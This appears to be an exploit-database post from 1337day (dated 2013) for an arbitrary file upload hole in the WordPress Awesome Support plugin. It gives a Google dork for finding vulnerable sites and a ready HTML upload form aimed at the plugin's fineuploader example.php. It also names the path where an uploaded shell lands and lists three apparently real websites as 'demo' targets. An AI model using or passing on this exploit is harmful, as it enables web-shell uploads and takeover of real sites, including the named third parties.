WordPress awesome-support插件任意文件上传漏洞

Code:

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0     _                   __           __       __                     1

1   /' \            __  /'__`\        /\ \__  /'__`\                   0

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1

1                  \ \____/ >> Exploit database separated by exploit   0

0                   \/___/          type (local, remote, DoS, etc.)    1

1                                                                      1

0  [+] Site            : 1337day.com                                   0

1  [+] Support e-mail  : submit[at]1337day.com                         1

0                                                                      0

1               #########################################              1

0                  I'm DaOne member from Inj3ct0r Team                 1

1               #########################################              0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Exploit Title: WordPress Awesome Support - Arbitrary File Upload Vulnerability

# Author: DaOne (TGT)

# Vendor Homepage: [url]http://codecanyon.net/item/wp-awesome-support-responsive-ticket-system/4619686[/url]

# Price: $21

# Category: webapps/php

# Google dork: inurl:wp-content/plugins/awesome-support

---------------------------------------------------



# Exploit

<html>

<body>

<form action="http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" method="post"

enctype="multipart/form-data">

Filename:<input type="file" name="qqfile" id="file"><br>

<input type="submit" name="submit" value="Submit">

</form>

</body>

</html>



just select your file and submit



Shell path: http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/



Demo sites

[url]http://buzness.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php[/url]

[url]http://themespixel.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php[/url]

[url]http://www.comproporvos.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php[/url]



# C168A953370DB22D   1337day.com [2013-10-18]   FBD32007C93EF975 #